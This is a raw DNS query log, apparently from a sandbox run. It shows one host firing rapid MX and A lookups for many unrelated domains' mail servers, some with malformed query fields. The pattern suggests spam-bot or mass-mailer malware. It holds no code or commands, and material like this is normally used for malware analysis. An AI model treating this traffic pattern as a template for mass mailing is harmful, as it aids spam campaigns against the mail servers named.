Feb 20, 2023 09:51:36.173178911 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:36.308537960 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	musical.com.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:37.020447016 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:37.022198915 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x.com.pt	0	3840	false
Feb 20, 2023 09:51:37.022623062 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:37.023051023 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false
Feb 20, 2023 09:51:37.147403955 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kywx.com.pt	0	3840	false
Feb 20, 2023 09:51:37.160098076 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:37.258969069 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x.com.pt	0	3840	false
Feb 20, 2023 09:51:37.354649067 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aaw.pl	0	3840	false
Feb 20, 2023 09:51:37.355321884 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:38.589526892 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:38.746731997 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:38.946341991 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.056608915 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x.com.pt	0	3840	false
Feb 20, 2023 09:51:39.063905954 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:39.065747976 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false
Feb 20, 2023 09:51:39.068713903 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	griepp.pl	0	3840	false
Feb 20, 2023 09:51:39.090055943 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kywx.com.pt	0	3840	false
Feb 20, 2023 09:51:39.091124058 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.153909922 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.174488068 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	oopp.pl	0	3840	false
Feb 20, 2023 09:51:39.208770990 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:39.217060089 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aaw.pl	0	3840	false
Feb 20, 2023 09:51:39.229762077 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kywx.com.pt	0	3840	false
Feb 20, 2023 09:51:39.275754929 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.287595987 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	wewew.pl	0	3840	false
Feb 20, 2023 09:51:39.293615103 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.417843103 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aaw.pl	0	3840	false
Feb 20, 2023 09:51:39.529098988 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	musical.com.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:39.532927990 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kywx.com.pt	0	3840	false
Feb 20, 2023 09:51:39.533972979 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	griepp.pl	0	3840	false
Feb 20, 2023 09:51:39.534065962 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	riekk.pl	0	3840	false
Feb 20, 2023 09:51:39.534132004 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.534324884 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.607811928 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	oopp.pl	0	3840	false
Feb 20, 2023 09:51:39.712024927 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kywx.com.pt	0	3840	false
Feb 20, 2023 09:51:39.719217062 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x.com.pt	0	3840	false
Feb 20, 2023 09:51:39.724855900 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aaw.pl	0	3840	false
Feb 20, 2023 09:51:39.745115995 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fafa.pk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:39.749408007 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	wewew.pl	0	3840	false
Feb 20, 2023 09:51:39.853185892 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aaw.pl	0	3840	false
Feb 20, 2023 09:51:39.857678890 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:39.930032015 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	riekk.pl	0	3840	false
Feb 20, 2023 09:51:39.930123091 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	griepp.pl	0	3840	false
Feb 20, 2023 09:51:39.936883926 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xara.pl	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.028063059 CET	192.168.2.5	8.8.8.8	0xf10f	Standard query (0)	blackhole.aftermarket.pl	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:40.055577993 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:40.063410997 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	griepp.pl	0	3840	false
Feb 20, 2023 09:51:40.083795071 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fafa.pk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.113941908 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	oopp.pl	0	3840	false
Feb 20, 2023 09:51:40.245955944 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kywx.com.pt	0	3840	false
Feb 20, 2023 09:51:40.250520945 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	oopp.pl	0	3840	false
Feb 20, 2023 09:51:40.271759987 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	lufka.zx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.274269104 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	wewew.pl	0	3840	false
Feb 20, 2023 09:51:40.389282942 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	lufka.zx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.460460901 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fanfary.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.464396000 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	riekk.pl	0	3840	false
Feb 20, 2023 09:51:40.471716881 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	wewew.pl	0	3840	false
Feb 20, 2023 09:51:40.481937885 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aaw.pl	0	3840	false
Feb 20, 2023 09:51:40.625559092 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xxv.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.656017065 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	riekk.pl	0	3840	false
Feb 20, 2023 09:51:40.657809019 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	griepp.pl	0	3840	false
Feb 20, 2023 09:51:40.662374020 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fafa.pk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.726382971 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fajrant.qz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.781589031 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	oopp.pl	0	3840	false
Feb 20, 2023 09:51:40.789195061 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fafa.pk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.832207918 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.890866995 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	wewew.pl	0	3840	false
Feb 20, 2023 09:51:40.919617891 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	lufka.zx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.932141066 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.053720951 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	riekk.pl	0	3840	false
Feb 20, 2023 09:51:41.061522961 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fanfary.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.062508106 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	lufka.zx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.199296951 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fafa.pk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.201304913 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fanfary.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.202008963 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xxv.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.249291897 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false
Feb 20, 2023 09:51:41.491019011 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fajrant.qz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.499612093 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xara.pl	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.521895885 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:41.522875071 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xxv.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.526895046 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	lufka.zx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.557027102 CET	192.168.2.5	8.8.8.8	0xac19	Standard query (0)	blackhole.aftermarket.pl	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:41.577311993 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:41.655951977 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fajrant.qz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.665564060 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x.com.pt	0	3840	false
Feb 20, 2023 09:51:41.669951916 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fanfary.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.746602058 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:41.768476009 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.776098967 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xxv.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.826843023 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:41.882910013 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fajrant.qz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.920164108 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kywx.com.pt	0	3840	false
Feb 20, 2023 09:51:42.008272886 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.014559031 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.021549940 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aaw.pl	0	3840	false
Feb 20, 2023 09:51:42.036990881 CET	192.168.2.5	8.8.8.8	0x45b	Standard query (0)	contoso-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:42.083780050 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	griepp.pl	0	3840	false
Feb 20, 2023 09:51:42.124537945 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	griepp.pl	0	3840	false
Feb 20, 2023 09:51:42.239579916 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	oopp.pl	0	3840	false
Feb 20, 2023 09:51:42.252017975 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	adatum.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.283993959 CET	192.168.2.5	8.8.8.8	0x7e6e	Standard query (0)	mail.adatum.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:42.332928896 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	wewew.pl	0	3840	false
Feb 20, 2023 09:51:42.426815033 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	riekk.pl	0	3840	false
Feb 20, 2023 09:51:42.526510954 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fafa.pk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.527329922 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.688500881 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	lufka.zx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.803039074 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fanfary.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:42.901449919 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xxv.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.005853891 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fajrant.qz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.040033102 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	lufka.zx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.089804888 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	adatum.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.120529890 CET	192.168.2.5	8.8.8.8	0x3a8f	Standard query (0)	mail.adatum.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.217456102 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fanfary.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.231324911 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.344580889 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.es	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.351114035 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.362478971 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xxv.pq	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.438977003 CET	192.168.2.5	8.8.8.8	0xead4	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:43.489866972 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fajrant.qz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.582604885 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.770529985 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.es	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.777496099 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:43.795171976 CET	192.168.2.5	8.8.8.8	0xeff9	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:44.005565882 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:44.882313013 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.094935894 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.188195944 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.296075106 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.302634001 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.303324938 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.312025070 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.456296921 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fabrikam.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.464626074 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.464906931 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.495589972 CET	192.168.2.5	8.8.8.8	0x913a	Standard query (0)	mail.fabrikam.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:45.903682947 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.910495996 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:45.936439991 CET	192.168.2.5	8.8.8.8	0xa46e	Standard query (0)	contoso-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:45.993393898 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.185982943 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	litwareinc.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.220830917 CET	192.168.2.5	8.8.8.8	0x8e1a	Standard query (0)	smtp.litwareinc.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:46.606086016 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.742384911 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.830780983 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.942373037 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fabrikam.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:46.967318058 CET	192.168.2.5	8.8.8.8	0x2729	Standard query (0)	mail.fabrikam.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:47.244208097 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	adatum.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:47.272074938 CET	192.168.2.5	8.8.8.8	0x18f7	Standard query (0)	mail.adatum.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:47.431310892 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:49.101991892 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:50.402276039 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:50.507515907 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:50.634474039 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:51.180654049 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:52.700098038 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:52.712379932 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.026125908 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	negdje.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.041403055 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.789928913 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.798712015 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdef.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.893554926 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:54.991691113 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	vlada.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:55.037863016 CET	192.168.2.5	8.8.8.8	0x766d	Standard query (0)	ma-01.vlada.hr	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:55.648137093 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	netko.hr	0	3840	false
Feb 20, 2023 09:51:56.422400951 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:56.543185949 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tvrtka.hr	0	3840	false
Feb 20, 2023 09:51:56.831571102 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	dva.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:56.945422888 CET	192.168.2.5	8.8.8.8	0x342f	Standard query (0)	mail.dva.hr	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:58.539057970 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:58.763895988 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	arb.cz	0	3840	false
Feb 20, 2023 09:51:59.072921038 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdefg.cz	0	3840	false
Feb 20, 2023 09:51:59.176976919 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ektro.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.429430962 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fb.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:59.461935043 CET	192.168.2.5	8.8.8.8	0x6229	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:00.055669069 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tek-astore.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.093592882 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	negdje.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.171664000 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	somemail.ro	0	3840	false
Feb 20, 2023 09:52:00.235704899 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdef.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.275805950 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abc.org	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:00.339647055 CET	192.168.2.5	8.8.8.8	0x26dd	Standard query (0)	abc-org.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:00.421890020 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	netko.hr	0	3840	false
Feb 20, 2023 09:52:00.517992973 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tvrtka.hr	0	3840	false
Feb 20, 2023 09:52:01.389568090 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	arb.cz	0	3840	false
Feb 20, 2023 09:52:01.630146027 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdefg.cz	0	3840	false
Feb 20, 2023 09:52:01.739080906 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ektro.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:01.781980991 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	emaiserver.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:01.935786963 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	worldwideoffices.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:01.941696882 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tek-astore.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.290122032 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	orice.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.292325020 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	somemail.ro	0	3840	false
Feb 20, 2023 09:52:02.332462072 CET	192.168.2.5	8.8.8.8	0x93c9	Standard query (0)	mx.leonet.it	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:02.533541918 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	emaiserver.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.688110113 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	worldwideoffices.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:02.875051022 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	orice.ro	0	3840	false
Feb 20, 2023 09:52:02.997689009 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x	0	15	false
Feb 20, 2023 09:52:03.078491926 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ppp.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:03.263006926 CET	192.168.2.5	8.8.8.8	0x689	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
